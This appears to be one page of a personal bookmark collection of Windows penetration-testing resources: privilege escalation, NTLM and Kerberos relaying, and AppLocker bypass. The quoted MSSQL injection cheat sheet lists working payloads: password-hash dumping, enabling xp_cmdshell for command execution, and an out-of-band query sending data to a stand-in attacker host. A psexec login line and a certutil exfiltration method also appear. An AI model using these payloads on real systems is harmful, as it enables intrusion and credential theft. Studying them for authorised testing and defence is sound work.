776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
◄Older
page 4 / 5
Newer►
88 results tagged windows x
  • thumbnail
    GitHub - rootm0s/WinPwnage: UAC bypass, Elevate, Persistence and Execution methods
    November 14, 2019 at 8:03:17 PM UTC * - permalink -
    QRCode
    - https://github.com/rootm0s/WinPwnage
    winprivesc privesc privilege escalation windows hacking pentest
  • “Relaying” Kerberos - Having fun with unconstrained delegation - dirkjanm.io
    November 12, 2019 at 10:00:36 AM UTC * - permalink -
    QRCode
    - https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
    kerberos krbrelay krbrelaying tickets ptt hacking pentest unconstrained delegation privilege escalation privesc windows
  • thumbnail
    Windows Privilege Escalation via Unquoted Service Paths – root@Hausec
    November 12, 2019 at 9:52:54 AM UTC * - permalink -
    QRCode
    - https://hausec.com/2018/10/05/windows-privilege-escalation-via-unquoted-service-paths/
    unquoted service paths active directory privilege escalation privesc ad enum windows hacking pentest
  • thumbnail
    Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
    October 29, 2019 at 3:50:31 PM UTC - permalink -
    QRCode
    - https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
    ntlm relay ntlmrelay responder hash windows hacking pentest netntlm lm nt
  • thumbnail
    Index of /public/MSDN/
    October 29, 2019 at 3:44:50 PM UTC - permalink -
    QRCode
    - https://the-eye.eu/public/MSDN/
    theeye hacking iso download downloads torrent windows software leak leaks
  • thumbnail
    RE for Beginners | Reverse Engineering
    October 18, 2019 at 3:13:29 PM UTC - permalink -
    QRCode
    - https://www.begin.re/
    reverse reversing howto tuto beginner begin engineering hacking binary minesweeper windows x86 ida
  • Windows Logon Forensics - windows-logon-forensics-34132
    October 15, 2019 at 4:29:07 PM UTC * - permalink -
    QRCode
    - https://www.sans.org/reading-room/whitepapers/forensics/windows-logon-forensics-34132
    logon windows password ntlm digest whitepaper tuto forensic
  • thumbnail
    Recipe for Root - Your Cookbook for Privilege Escalation
    October 9, 2019 at 4:09:17 PM UTC * - permalink -
    QRCode
    - https://recipeforroot.com/
    privesc windows linux privilege escalation hacking pentest howto tuto
  • thumbnail
    GPO - Chemin d'attaque - hackndo
    July 11, 2019 at 12:39:47 PM UTC - permalink -
    QRCode
    - https://beta.hackndo.com/gpo-abuse-with-edit-settings/
    gpo ad windows hacking pentest bloodhound
  • thumbnail
    How to Get a Windows XP Download Free From Microsoft, Legally
    June 3, 2019 at 6:51:57 PM UTC - permalink -
    QRCode
    - https://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/
    windows xp download vm virtual machine legal free
  • thumbnail
    AppLocker Bypass – MSBuild | Penetration Testing Lab
    June 3, 2019 at 10:01:26 AM UTC - permalink -
    QRCode
    - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
    byass applocker msbuild hacking pentest windows policies
  • thumbnail
    SMB Share – SCF File Attacks | Penetration Testing Lab
    June 3, 2019 at 10:00:47 AM UTC - permalink -
    QRCode
    - https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
    smb hacking pentest scf hash ntlm relay responder share windows
  • thumbnail
    BloodHound with Kali Linux: 101 - Red Teaming Experiments
    April 3, 2019 at 11:54:50 AM UTC - permalink -
    QRCode
    - https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux
    bloodhound windows hacking penstest active directory ad exploitation mapping ldap sharphound
  • thumbnail
    A Virgil's Guide to Pentest: Escalation Time
    March 31, 2019 at 7:17:11 PM UTC - permalink -
    QRCode
    - http://virgil-cj.blogspot.com/2018/02/escalation-time.html
    windows hacking pentest post exploitation guide howto
  • thumbnail
    PowerUp: A Usage Guide – harmj0y
    March 31, 2019 at 7:04:32 PM UTC - permalink -
    QRCode
    - https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
    powerup powershell windows exploitation post hacking pentest
  • thumbnail
    Using Credentials to Own Windows Boxes (from Kali)

    psexec.py 'DOMAIN\user:passw0rd1!'@10.10.10.10

    March 31, 2019 at 7:03:07 PM UTC - permalink -
    QRCode
    - https://blog.ropnop.com/using-credentials-to-own-windows-boxes/
    psexec smb windows hacking post exploitation revshell
  • thumbnail
    Windows Privilege Escalation Guide

    Script https://github.com/absolomb/WindowsEnum

    March 30, 2019 at 2:51:49 PM UTC - permalink -
    QRCode
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    windows privilege escalation guide post hacking pentest
  • thumbnail
    MSSQL Injection Cheat Sheet | pentestmonkey
    March 28, 2019 at 1:38:44 PM UTC - permalink -
    QRCode
    - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows
  • thumbnail
    SQL Injection Cheat Sheet: MSSQL — GracefulSecurity
    Version
    SELECT @@version;
    SELECT @@VERSION LIKE '%2008%';
    
    User details
    SELECT user;
    SELECT current_user;
    SELECT SYSTEM_USER;
    SELECT USER_NAME();
    SELECT USER_NAME(2);
    SELECT SUSER_SNAME();
    SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
    SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
    
    Database details
    SELECT DB_NAME();
    SELECT DB_NAME(5);
    SELECT name FROM master..sysdatabases;
    
    Database credentials
    SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;
    
    Server details
    SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');
    
    Table Names
    SELECT name FROM master..sysobjects WHERE xtype='U';
    SELECT table_name FROM information_schema.tables;
    
    Columns Names
    SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename';
    SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';
    
    No Quotes
    SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;
    
    String Concatenation
    SELECT CONCAT('a','a','a');
    SELECT 'a' %2b 'b' %2b 'c' %2b 'd';
    
    Conditionals
    IF 1=1 SELECT 'true' ELSE SELECT 'false';
    SELECT CASE WHEN 1=1 THEN true ELSE false END;
    
    Time-delay
    WAITFOR DELAY 'time_to_pass';
    WAITFOR TIME 'time_to_execute';
    
    Enable Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell', 1;
    EXEC sp_configure reconfigure;
    
    Command Execution
    EXEC master.dbo.xp_cmdshell 'cmd';
    
    Enable Alternative Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'OLE Automation Procedures', 1;
    EXEC sp_configure reconfigure;
    
    Alternative Command Execution
    DECLARE @execmd INT;
    EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
    EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';
    
    "RunAs"
    SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
    EXECUTE AS USER = 'FooUser';
    
    Read Files
    BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );
    
    Out-of-Band Retrieval
    ;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  
    
    Substrings
    SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
    ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;
    
    Retrieve Nth Line
    SELECT TOP 1 table_name FROM information_schema.tables;
    SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);
    March 28, 2019 at 1:36:53 PM UTC - permalink -
    QRCode
    - https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
    xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest
  • thumbnail
    Red Team Tales 0x01: From MSSQL to RCE - Tarlogic Security - Cyber Security and Ethical hacking
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

    The procedure to achieve it is as follows:

    Declare a variable of “table” type to save the output that returns the xp_cmdshell procedure (remember that it returns the result in several rows).
    Dump the output of the command to the previous variable.
    Concatenate the rows of the table, separated by a line break.
    Encode the resulting string in Base64 and save it in a variable.
    Generate the certutil command, appending the string with the result.
    Execute it.
    March 28, 2019 at 12:15:52 AM UTC - permalink -
    QRCode
    - https://www.tarlogic.com/en/blog/red-team-tales-0x01/
    htb querier giddy sql sqli mssql windows hacking redteam pentest rce xp_cmdshell
Links per page: 20 50 100
◄Older
page 4 / 5
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation